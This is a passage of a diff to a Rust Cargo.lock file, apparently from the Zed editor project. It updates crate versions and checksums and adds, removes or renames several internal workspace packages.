"fb33595f1279fe7af03b28245060e9085caf98b10ed3137461a85796eb83972a" dependencies = [ "serde", "serde_derive", @@ -3963,9 +3902,9 @@ dependencies = [ [[package]] name = "cranelift-codegen" -version = "0.120.2" +version = "0.123.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "aeda0892577afdce1ac2e9a983a55f8c5b87a59334e1f79d8f735a2d7ba4f4b4" +checksum = "0230a6ac0660bfe31eb244cbb43dcd4f2b3c1c4e0addc3e0348c6053ea60272e" dependencies = [ "bumpalo", "cranelift-assembler-x64", @@ -3976,7 +3915,7 @@ dependencies = [ "cranelift-control", "cranelift-entity", "cranelift-isle", - "gimli 0.31.1", + "gimli", "hashbrown 0.15.5", "log", "postcard", @@ -3988,40 +3927,42 @@ dependencies = [ "sha2", "smallvec", "target-lexicon 0.13.3", + "wasmtime-internal-math", ] [[package]] name = "cranelift-codegen-meta" -version = "0.120.2" +version = "0.123.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e461480d87f920c2787422463313326f67664e68108c14788ba1676f5edfcd15" +checksum = "96d6817fdc15cb8f236fc9d8e610767d3a03327ceca4abff7a14d8e2154c405e" dependencies = [ "cranelift-assembler-x64-meta", "cranelift-codegen-shared", "cranelift-srcgen", + "heck 0.5.0", "pulley-interpreter", ] [[package]] name = "cranelift-codegen-shared" -version = "0.120.2" +version = "0.123.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "976584d09f200c6c84c4b9ff7af64fc9ad0cb64dffa5780991edd3fe143a30a1" +checksum = "0403796328e9e2e7df2b80191cdbb473fd9ea3889eb45ef5632d0fef168ea032" [[package]] name = "cranelift-control" -version = "0.120.2" +version = "0.123.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "46d43d70f4e17c545aa88dbf4c84d4200755d27c6e3272ebe4de65802fa6a955" +checksum = "188f04092279a3814e0b6235c2f9c2e34028e4beb72da7bfed55cbd184702bcc" dependencies = [ "arbitrary", ] [[package]] name = "cranelift-entity" -version = "0.120.2" +version = "0.123.6" source = 
"registry+https://github.com/rust-lang/crates.io-index" -checksum = "d75418674520cb400c8772bfd6e11a62736c78fc1b6e418195696841d1bf91f1" +checksum = "43f5e7391167605d505fe66a337e1a69583b3f34b63d359ffa5a430313c555e8" dependencies = [ "cranelift-bitset", "serde", @@ -4030,9 +3971,9 @@ dependencies = [ [[package]] name = "cranelift-frontend" -version = "0.120.2" +version = "0.123.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3c8b1a91c86687a344f3c52dd6dfb6e50db0dfa7f2e9c7711b060b3623e1fdeb" +checksum = "ea5440792eb2b5ba0a0976df371b9f94031bd853ae56f389de610bca7128a7cb" dependencies = [ "cranelift-codegen", "log", @@ -4042,15 +3983,15 @@ dependencies = [ [[package]] name = "cranelift-isle" -version = "0.120.2" +version = "0.123.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "711baa4e3432d4129295b39ec2b4040cc1b558874ba0a37d08e832e857db7285" +checksum = "1e5c05fab6fce38d729088f3fa1060eaa1ad54eefd473588887205ed2ab2f79e" [[package]] name = "cranelift-native" -version = "0.120.2" +version = "0.123.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "41c83e8666e3bcc5ffeaf6f01f356f0e1f9dcd69ce5511a1efd7ca5722001a3f" +checksum = "9c9a0607a028edf5ba5bba7e7cf5ca1b7f0a030e3ae84dcd401e8b9b05192280" dependencies = [ "cranelift-codegen", "libc", @@ -4059,9 +4000,9 @@ dependencies = [ [[package]] name = "cranelift-srcgen" -version = "0.120.2" +version = "0.123.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "02e3f4d783a55c64266d17dc67d2708852235732a100fc40dd9f1051adc64d7b" +checksum = "cb0f2da72eb2472aaac6cfba4e785af42b1f2d82f5155f30c9c30e8cce351e17" [[package]] name = "crash-context" @@ -4091,14 +4032,13 @@ dependencies = [ name = "crashes" version = "0.1.0" dependencies = [ - "anyhow", - "bincode", "cfg-if", "crash-handler", - "futures 0.3.31", + "futures 0.3.32", "log", "mach2 0.5.0", "minidumper", + "parking_lot", "paths", "release_channel", "serde", @@ 
-4151,12 +4091,8 @@ name = "credentials_provider" version = "0.1.0" dependencies = [ "anyhow", - "futures 0.3.31", "gpui", - "paths", - "release_channel", "serde", - "serde_json", ] [[package]] @@ -4309,7 +4245,21 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "13b588ba4ac1a99f7f2964d24b3d896ddc6bf847ee3855dbd4366f058cfcd331" dependencies = [ "quote", - "syn 2.0.106", + "syn 2.0.117", +] + +[[package]] +name = "csv_preview" +version = "0.1.0" +dependencies = [ + "anyhow", + "editor", + "feature_flags", + "gpui", + "log", + "text", + "ui", + "workspace", ] [[package]] @@ -4367,12 +4317,12 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "d74b6bcf49ebbd91f1b1875b706ea46545032a14003b5557b7dfa4bbeba6766e" dependencies = [ "cc", - "codespan-reporting 0.13.0", + "codespan-reporting", "indexmap", "proc-macro2", "quote", "scratch", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -4382,11 +4332,11 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "94ca2ad69673c4b35585edfa379617ac364bccd0ba0adf319811ba3a74ffa48a" dependencies = [ "clap", - "codespan-reporting 0.13.0", + "codespan-reporting", "indexmap", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -4404,7 +4354,7 @@ dependencies = [ "indexmap", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -4420,7 +4370,7 @@ dependencies = [ "collections", "dap-types", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "http_client", "language", @@ -4438,8 +4388,6 @@ dependencies = [ "smol", "task", "telemetry", - "tree-sitter", - "tree-sitter-go", "util", "zlog", ] @@ -4464,7 +4412,7 @@ dependencies = [ "dap", "dotenvy", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "http_client", "json_dotpath", @@ -4486,22 +4434,46 @@ version = "0.20.11" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "fc7f46116c46ff9ab3eb1597a45688b6715c6e628b5c133e288e709a29bcb4ee" 
dependencies = [ - "darling_core", - "darling_macro", + "darling_core 0.20.11", + "darling_macro 0.20.11", +] + +[[package]] +name = "darling" +version = "0.21.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9cdf337090841a411e2a7f3deb9187445851f91b309c0c0a29e05f74a00a48c0" +dependencies = [ + "darling_core 0.21.3", + "darling_macro 0.21.3", +] + +[[package]] +name = "darling_core" +version = "0.20.11" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "0d00b9596d185e565c2207a0b01f8bd1a135483d02d9b7b0a54b11da8d53412e" +dependencies = [ + "fnv", + "ident_case", + "proc-macro2", + "quote", + "strsim", + "syn 2.0.117", ] [[package]] name = "darling_core" -version = "0.20.11" +version = "0.21.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0d00b9596d185e565c2207a0b01f8bd1a135483d02d9b7b0a54b11da8d53412e" +checksum = "1247195ecd7e3c85f83c8d2a366e4210d588e802133e1e355180a9870b517ea4" dependencies = [ "fnv", "ident_case", "proc-macro2", "quote", "strsim", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -4510,9 +4482,20 @@ version = "0.20.11" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "fc34b93ccb385b40dc71c6fceac4b2ad23662c7eeb248cf10d529b7e055b6ead" dependencies = [ - "darling_core", + "darling_core 0.20.11", + "quote", + "syn 2.0.117", +] + +[[package]] +name = "darling_macro" +version = "0.21.3" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d38308df82d1080de0afee5d069fa14b0326a88c14f15c5ccda35b4a6c414c81" +dependencies = [ + "darling_core 0.21.3", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -4554,6 +4537,7 @@ dependencies = [ "anyhow", "gpui", "indoc", + "inventory", "log", "paths", "release_channel", @@ -4562,6 +4546,7 @@ dependencies = [ "sqlez_macros", "tempfile", "util", + "uuid", "zed_env_vars", ] @@ -4598,7 +4583,7 @@ dependencies = [ "anyhow", "dap", "editor", - "futures 0.3.31", + 
"futures 0.3.32", "gpui", "project", "serde_json", @@ -4625,7 +4610,7 @@ dependencies = [ "editor", "feature_flags", "file_icons", - "futures 0.3.31", + "futures 0.3.32", "fuzzy", "gpui", "hex", @@ -4653,6 +4638,7 @@ dependencies = [ "terminal_view", "text", "theme", + "theme_settings", "tree-sitter", "tree-sitter-go", "tree-sitter-json", @@ -4679,7 +4665,7 @@ name = "deepseek" version = "0.1.0" dependencies = [ "anyhow", - "futures 0.3.31", + "futures 0.3.32", "http_client", "schemars", "serde", @@ -4744,40 +4730,29 @@ checksum = "1e567bd82dcff979e4b03460c307b3cdc9e96fde3d73bed1496d2bc75d9dd62a" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", -] - -[[package]] -name = "derive_more" -version = "0.99.20" -source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6edb4b64a43d977b8e99788fe3a04d483834fba1215a7e02caa415b626497f7f" -dependencies = [ - "convert_case 0.4.0", - "proc-macro2", - "quote", - "rustc_version", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] name = "derive_more" -version = "2.0.1" +version = "2.1.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "093242cf7570c207c83073cf82f79706fe7b8317e98620a47d5be7c3d8497678" +checksum = "d751e9e49156b02b44f9c1815bcb94b984cdcc4396ecc32521c739452808b134" dependencies = [ "derive_more-impl", ] [[package]] name = "derive_more-impl" -version = "2.0.1" +version = "2.1.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "bda628edc44c4bb645fbe0f758797143e4e07926f7ebf4e9bdfbd3d2ce621df3" +checksum = "799a97264921d8623a957f6c3b9011f3b5492f557bbb7a5a19b7fa6d06ba8dcb" dependencies = [ + "convert_case 0.10.0", "proc-macro2", "quote", - "syn 2.0.106", + "rustc_version", + "syn 2.0.117", "unicode-xid", ] @@ -4787,43 +4762,46 @@ version = "0.1.0" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] name = "derive_setters" -version = "0.1.8" +version = "0.1.9" source = 
"registry+https://github.com/rust-lang/crates.io-index" -checksum = "ae5c625eda104c228c06ecaf988d1c60e542176bd7a490e60eeda3493244c0c9" +checksum = "b7e6f6fa1f03c14ae082120b84b3c7fbd7b8588d924cf2d7c3daf9afd49df8b9" dependencies = [ - "darling", + "darling 0.21.3", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] name = "dev_container" version = "0.1.0" dependencies = [ + "async-tar", + "async-trait", + "env_logger 0.11.8", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "http 1.3.1", "http_client", "log", "menu", - "node_runtime", "paths", "picker", "project", "serde", "serde_json", + "serde_json_lenient", "settings", - "smol", - "theme", + "shlex", "ui", "util", + "walkdir", "workspace", "worktree", ] @@ -4833,7 +4811,6 @@ name = "diagnostics" version = "0.1.0" dependencies = [ "anyhow", - "client", "collections", "component", "ctor", @@ -4853,6 +4830,7 @@ dependencies = [ "settings", "text", "theme", + "theme_settings", "ui", "unindent", "util", @@ -4961,7 +4939,7 @@ dependencies = [ "libc", "option-ext", "redox_users 0.5.2", - "windows-sys 0.59.0", + "windows-sys 0.61.2", ] [[package]] @@ -4972,11 +4950,13 @@ checksum = "bd0c93bb4b0c6d9b77f4435b0ae98c24d17f1c45b2ff844c6151a07256ca923b" [[package]] name = "dispatch2" -version = "0.3.0" +version = "0.3.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "89a09f22a6c6069a18470eb92d2298acf25463f14256d24778e1230d789a2aec" +checksum = "1e0e367e4e7da84520dedcac1901e4da967309406d1e51017ae1abfb97adbd38" dependencies = [ "bitflags 2.10.0", + "block2", + "libc", "objc2", ] @@ -4988,7 +4968,7 @@ checksum = "97369cbbc041bc366949bc74d34658d6cda5621039731c6310521892a3a20ae0" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -5051,7 +5031,7 @@ dependencies = [ "proc-macro2", "quote", "strum 0.27.2", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -5179,8 +5159,6 @@ version = "0.1.0" dependencies = [ "ai_onboarding", "anyhow", - 
"arrayvec", - "brotli", "buffer_diff", "client", "clock", @@ -5189,14 +5167,16 @@ dependencies = [ "collections", "copilot", "copilot_ui", + "credentials_provider", "ctor", "db", "edit_prediction_context", "edit_prediction_types", "feature_flags", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", + "heapless", "indoc", "itertools 0.14.0", "language", @@ -5224,13 +5204,13 @@ dependencies = [ "thiserror 2.0.17", "time", "toml 0.8.23", - "tree-sitter-rust", "ui", "util", "uuid", "workspace", "worktree", "zed_actions", + "zed_credentials_provider", "zeta_prompt", "zlog", "zstd", @@ -5247,13 +5227,15 @@ dependencies = [ "client", "cloud_llm_client", "collections", + "criterion", + "db", "debug_adapter_extension", "dirs 4.0.0", "edit_prediction", "extension", "flate2", "fs", - "futures 0.3.31", + "futures 0.3.32", "gaoya", "gpui", "gpui_platform", @@ -5305,7 +5287,7 @@ dependencies = [ "clock", "collections", "env_logger 0.11.8", - "futures 0.3.31", + "futures 0.3.32", "gpui", "indoc", "language", @@ -5322,7 +5304,6 @@ dependencies = [ "tree-sitter", "util", "zeta_prompt", - "zlog", ] [[package]] @@ -5343,7 +5324,6 @@ dependencies = [ "anyhow", "buffer_diff", "client", - "clock", "cloud_llm_client", "codestral", "collections", @@ -5356,34 +5336,27 @@ dependencies = [ "editor", "feature_flags", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "indoc", "language", - "language_model", - "lsp", "markdown", "menu", "multi_buffer", "paths", - "pretty_assertions", "project", "regex", - "release_channel", - "semver", - "serde_json", "settings", - "supermaven", "telemetry", "text", "theme", + "theme_settings", "time", "ui", "util", "workspace", "zed_actions", "zeta_prompt", - "zlog", ] [[package]] @@ -5408,11 +5381,10 @@ dependencies = [ "feature_flags", "file_icons", "fs", - "futures 0.3.31", + "futures 0.3.32", "fuzzy", "git", "gpui", - "http_client", "indoc", "itertools 0.14.0", "language", @@ -5427,6 +5399,8 @@ dependencies = [ "parking_lot", "pretty_assertions", 
"project", + "proptest", + "proptest-derive", "rand 0.9.2", "regex", "release_channel", @@ -5443,9 +5417,9 @@ dependencies = [ "sum_tree", "task", "telemetry", - "tempfile", "text", "theme", + "theme_settings", "time", "tracing", "tree-sitter-bash", @@ -5603,7 +5577,7 @@ dependencies = [ "heck 0.5.0", "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -5624,7 +5598,7 @@ checksum = "67c78a4d8fdf9953a5c9d458f9efe940fd97a0cab0941c075a813ac594733827" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -5663,6 +5637,13 @@ dependencies = [ "log", ] +[[package]] +name = "env_var" +version = "0.1.0" +dependencies = [ + "gpui", +] + [[package]] name = "envy" version = "0.4.2" @@ -5689,7 +5670,7 @@ checksum = "44f23cf4b44bfce11a86ace86f8a73ffdec849c9fd00a386a53d278bd9e81fb3" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -5727,7 +5708,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "39cab71617ae0d63f51a36d69f866391735b51691dbda63cf6f96d042b63efeb" dependencies = [ "libc", - "windows-sys 0.59.0", + "windows-sys 0.61.2", ] [[package]] @@ -5740,6 +5721,15 @@ dependencies = [ "libc", ] +[[package]] +name = "error-graph" +version = "0.1.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "9b920e777967421aa5f9bf34f842c0ab6ba19b3bdb4a082946093860f5858879" +dependencies = [ + "serde", +] + [[package]] name = "etagere" version = "0.2.15" @@ -5788,58 +5778,44 @@ dependencies = [ ] [[package]] -name = "eval" +name = "eval_cli" version = "0.1.0" dependencies = [ "acp_thread", "agent", "agent-client-protocol", - "agent_settings", "agent_ui", "anyhow", - "async-trait", - "buffer_diff", - "chrono", "clap", "client", - "collections", + "ctrlc", + "db", "debug_adapter_extension", - "dirs 4.0.0", - "dotenvy", "env_logger 0.11.8", "extension", + "feature_flags", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", 
"gpui_platform", "gpui_tokio", - "handlebars 4.5.0", "language", "language_extension", "language_model", "language_models", "languages", - "markdown", "node_runtime", - "pathdiff", "paths", - "pretty_assertions", "project", "prompt_store", - "rand 0.9.2", - "regex", "release_channel", "reqwest_client", "serde", "serde_json", "settings", "shellexpand 2.1.2", - "telemetry", "terminal_view", - "toml 0.8.23", - "unindent", "util", - "uuid", "watch", ] @@ -5929,7 +5905,7 @@ dependencies = [ "collections", "dap", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "heck 0.5.0", "http_client", @@ -5971,8 +5947,10 @@ dependencies = [ "serde", "serde_json", "serde_json_lenient", + "settings_content", "snippet_provider", - "theme", + "task", + "theme_settings", "tokio", "toml 0.8.23", "tree-sitter", @@ -5995,7 +5973,7 @@ dependencies = [ "dap", "extension", "fs", - "futures 0.3.31", + "futures 0.3.32", "gpui", "gpui_tokio", "http_client", @@ -6008,7 +5986,6 @@ dependencies = [ "parking_lot", "paths", "project", - "rand 0.9.2", "release_channel", "remote", "reqwest_client", @@ -6022,6 +5999,7 @@ dependencies = [ "tempfile", "theme", "theme_extension", + "theme_settings", "toml 0.8.23", "tracing", "url", @@ -6060,7 +6038,7 @@ dependencies = [ "smallvec", "strum 0.27.2", "telemetry", - "theme", + "theme_settings", "ui", "util", "vim_mode_setting", @@ -6068,6 +6046,12 @@ dependencies = [ "zed_actions", ] +[[package]] +name = "failspot" +version = "0.2.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "c942e64b20ecd39933d5ff938ca4fdb6ef0d298cc3855b231179a5ef0b24948d" + [[package]] name = "fallible-iterator" version = "0.3.0" @@ -6080,7 +6064,18 @@ version = "0.16.2" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "998b056554fbe42e03ae0e152895cd1a7e1002aec800fdc6635d20270260c46f" dependencies = [ - "bit-set", + "bit-set 0.8.0", + "regex-automata", + "regex-syntax", +] + +[[package]] +name = "fancy-regex" +version = 
"0.17.0" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "72cf461f865c862bb7dc573f643dd6a2b6842f7c30b07882b56bd148cc2761b8" +dependencies = [ + "bit-set 0.8.0", "regex-automata", "regex-syntax", ] @@ -6123,7 +6118,7 @@ checksum = "a0aca10fb742cb43f9e7bb8467c91aa9bcb8e3ffbc6a6f7389bb93ffc920577d" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -6150,7 +6145,6 @@ dependencies = [ name = "feature_flags" version = "0.1.0" dependencies = [ - "futures 0.3.31", "gpui", ] @@ -6158,7 +6152,6 @@ dependencies = [ name = "feedback" version = "0.1.0" dependencies = [ - "editor", "gpui", "system_specs", "urlencoding", @@ -6182,25 +6175,27 @@ name = "file_finder" version = "0.1.0" dependencies = [ "anyhow", + "channel", + "client", "collections", "ctor", "editor", "file_icons", - "futures 0.3.31", + "futures 0.3.32", "fuzzy", "gpui", - "language", "menu", "open_path_prompt", "picker", "pretty_assertions", "project", "project_panel", + "remote_connection", "serde", "serde_json", "settings", - "text", "theme", + "theme_settings", "ui", "util", "workspace", @@ -6422,7 +6417,7 @@ checksum = "1a5c6c585bc94aaf2c7b51dd4c2ba22680844aba4c687be581871a6f518c5742" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] @@ -6486,8 +6481,9 @@ dependencies = [ "async-trait", "cocoa 0.26.0", "collections", + "dunce", "fs", - "futures 0.3.31", + "futures 0.3.32", "git", "gpui", "ignore", @@ -6585,9 +6581,9 @@ checksum = "3a471a38ef8ed83cd6e40aa59c1ffe17db6855c18e3604d9c4ed8c08ebc28678" [[package]] name = "futures" -version = "0.3.31" +version = "0.3.32" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "65bc07b1a8bc7c85c5f2e110c476c7389b4554ba72af57d8445ea63a576b0876" +checksum = "8b147ee9d1f6d097cef9ce628cd2ee62288d963e16fb287bd9286455b241382d" dependencies = [ "futures-channel", "futures-core", @@ -6600,9 +6596,9 @@ dependencies = [ [[package]] name = 
"futures-channel" -version = "0.3.31" +version = "0.3.32" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2dff15bf788c671c1934e366d07e30c1814a8ef514e1af724a602e8a2fbe1b10" +checksum = "07bbe89c50d7a535e539b8c17bc0b49bdb77747034daa8087407d655f3f7cc1d" dependencies = [ "futures-core", "futures-sink", @@ -6623,15 +6619,15 @@ dependencies = [ [[package]] name = "futures-core" -version = "0.3.31" +version = "0.3.32" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "05f29059c0c2090612e8d742178b0580d2dc940c837851ad723096f87af6663e" +checksum = "7e3450815272ef58cec6d564423f6e755e25379b217b0bc688e295ba24df6b1d" [[package]] name = "futures-executor" -version = "0.3.31" +version = "0.3.32" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1e28d1d997f585e54aebc3f97d39e72338912123a67330d723fdbb564d646c9f" +checksum = "baf29c38818342a3b26b5b923639e7b1f4a61fc5e76102d4b1981c6dc7a7579d" dependencies = [ "futures-core", "futures-task", @@ -6651,9 +6647,9 @@ dependencies = [ [[package]] name = "futures-io" -version = "0.3.31" +version = "0.3.32" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9e5c1b78ca4aae1ac06c48a526a655760685149f0d465d21f37abfe57ce075c6" +checksum = "cecba35d7ad927e23624b22ad55235f2239cfa44fd10428eecbeba6d6a717718" [[package]] name = "futures-lite" @@ -6685,32 +6681,32 @@ dependencies = [ [[package]] name = "futures-macro" -version = "0.3.31" +version = "0.3.32" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "162ee34ebcb7c64a8abebc059ce0fee27c2262618d7b60ed8faf72fef13c3650" +checksum = "e835b70203e41293343137df5c0664546da5745f82ec9b84d40be8336958447b" dependencies = [ "proc-macro2", "quote", - "syn 2.0.106", + "syn 2.0.117", ] [[package]] name = "futures-sink" -version = "0.3.31" +version = "0.3.32" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = 
"e575fab7d1e0dcb8d0c7bcf9a63ee213816ab51902e6d244a95819acacf1d4f7" +checksum = "c39754e157331b013978ec91992bde1ac089843443c49cbc7f46150b0fad0893" [[package]] name = "futures-task" -version = "0.3.31" +version = "0.3.32" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f90f7dce0722e95104fcb095585910c0977252f286e354b5e3bd38902cd99988" +checksum = "037711b3d59c33004d3856fbdc83b99d4ff37a24768fa1be9ce3538a1cde4393" [[package]] name = "futures-util" -version = "0.3.31" +version = "0.3.32" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9fa08315bb612088cc391249efdc3bc77536f16c91f6cf495e6fbe85b20a4a81" +checksum = "389ca41296e6190b48053de0321d02a77f32f8a5d2461dd38762c0593805c6d6" dependencies = [ "futures 0.1.31", "futures-channel", @@ -6719,9 +6715,9 @@ dependencies = [ "futures-macro", "futures-sink", "futures-task", + "libc", "memchr", "pin-project-lite", - "pin-utils", "slab", "tokio-io", ] @@ -7081,10 +7077,10 @@ dependencies = [ [[package]] name = "gh-workflow" version = "0.8.0" -source = "git+https://github.com/zed-industries/gh-workflow?rev=c9eac0ed361583e1072860d96776fa52775b82ac#c9eac0ed361583e1072860d96776fa52775b82ac" +source = "git+https://github.com/zed-industries/gh-workflow?rev=37f3c0575d379c218a9c455ee67585184e40d43f#37f3c0575d379c218a9c455ee67585184e40d43f" dependencies = [ "async-trait", - "derive_more 2.0.1", + "derive_more", "derive_setters", "gh-workflow-macros", "indexmap", @@ -7092,17 +7088,17 @@ dependencies = [ "serde", "serde_json", "serde_yaml", - "strum_macros", + "strum_macros 0.27.2", ] [[package]] name = "gh-workflow-macros" version = "0.8.0" -source = "git+https://github.com/zed-industries/gh-workflow?rev=c9eac0ed361583e1072860d96776fa52775b82ac#c9eac0ed361583e1072860d96776fa52775b82ac" +source = "git+https://github.com/zed-industries/gh-workflow?rev=37f3c0575d379c218a9c455ee67585184e40d43f#37f3c0575d379c218a9c455ee67585184e40d43f" dependencies = [ "heck 0.5.0", "quote", - "syn 
2.0.106", + "syn 2.0.117", ] [[package]] @@ -7117,9 +7113,9 @@ dependencies = [ [[package]] name = "gimli" -version = "0.31.1" +version = "0.32.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "07e28edb80900c19c28f1072f2e8aeca7fa06b23cd4169cefe1af5aa3260783f" +checksum = "e629b9b98ef3dd8afe6ca2bd0f89306cec16d43d907889945bc5d6687f2f13c7" dependencies = [ "fallible-iterator", "indexmap", @@ -7127,10 +7123,17 @@ dependencies = [ ] [[package]] -name = "gimli" -version = "0.32.3" +name = "gio-sys" +version = "0.21.5" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e629b9b98ef3dd8afe6ca2bd0f89306cec16d43d907889945bc5d6687f2f13c7" +checksum = "0071fe88dba8e40086c8ff9bbb62622999f49628344b1d1bf490a48a29d80f22" +dependencies = [ + "glib-sys", + "gobject-sys", + "libc", + "system-deps 7.0.7", + "windows-sys 0.61.2", +] [[package]] name = "git" @@ -7140,8 +7143,8 @@ dependencies = [ "askpass", "async-trait", "collections", - "derive_more 0.99.20", - "futures 0.3.31", + "derive_more", + "futures 0.3.32", "git2", "gpui", "http_client", @@ -7162,7 +7165,6 @@ dependencies = [ "text", "thiserror 2.0.17", "time", - "unindent", "url", "urlencoding", "util", @@ -7191,7 +7193,6 @@ dependencies = [ "collections", "db", "editor", - "feature_flags", "fs", "git", "git_ui", @@ -7200,11 +7201,14 @@ dependencies = [ "menu", "project", "rand 0.9.2", - "recent_projects", + "remote_connection", + "search", "serde_json", "settings", "smallvec", + "smol", "theme", + "theme_settings", "time", "ui", "workspace", @@ -7216,7 +7220,7 @@ version = "0.1.0" dependencies = [ "anyhow", "async-trait", - "futures 0.3.31", + "futures 0.3.32", "git", "gpui", "http_client", @@ -7241,17 +7245,15 @@ dependencies = [ "askpass", "buffer_diff", "call", - "cloud_llm_client", "collections", "component", "ctor", "db", "editor", - "feature_flags", - "futures 0.3.31", + "file_icons", + "futures 0.3.32", "fuzzy", "git", - "git_hosting_providers", "gpui", "indoc", 
"itertools 0.14.0", @@ -7268,6 +7270,7 @@ dependencies = [ "pretty_assertions", "project", "prompt_store", + "proto", "rand 0.9.2", "remote", "remote_connection", @@ -7280,6 +7283,7 @@ dependencies = [ "strum 0.27.2", "telemetry", "theme", + "theme_settings", "time", "time_format", "tracing", @@ -7307,6 +7311,50 @@ dependencies = [ "xml-rs", ] +[[package]] +name = "glib" +version = "0.21.5" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "16de123c2e6c90ce3b573b7330de19be649080ec612033d397d72da265f1bd8b" +dependencies = [ + "bitflags 2.10.0", + "futures-channel", + "futures-core", + "futures-executor", + "futures-task", + "futures-util", + "gio-sys", + "glib-macros", + "glib-sys", + "gobject-sys", + "libc", + "memchr", + "smallvec", +] + +[[package]] +name = "glib-macros" +version = "0.21.5" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "cf59b675301228a696fe01c3073974643365080a76cc3ed5bc2cbc466ad87f17" +dependencies = [ + "heck 0.5.0", + "proc-macro-crate", + "proc-macro2", + "quote", + "syn 2.0.117", +] + +[[package]] +name = "glib-sys" +version = "0.21.5" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "2d95e1a3a19ae464a7286e14af9a90683c64d70c02532d88d87ce95056af3e6c" +dependencies = [ + "libc", + "system-deps 7.0.7", +] + [[package]] name = "glob" version = "0.3.3" @@ -7340,9 +7388,9 @@ dependencies = [ [[package]] name = "glow" -version = "0.16.0" +version = "0.17.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c5e5ea60d70410161c8bf5da3fdfeaa1c72ed2c15f8bbb9d19fe3a4fad085f08" +checksum = "29038e1c483364cc6bb3cf78feee1816002e127c331a1eec55a4d202b9e1adb5" dependencies = [ "js-sys", "slotmap", @@ -7368,6 +7416,7 @@ dependencies = [ "indoc", "language", "menu", + "multi_buffer", "project", "rope", "serde", @@ -7375,18 +7424,27 @@ dependencies = [ "settings", "text", "theme", - "tree-sitter-rust", - "tree-sitter-typescript", "ui", "util", 
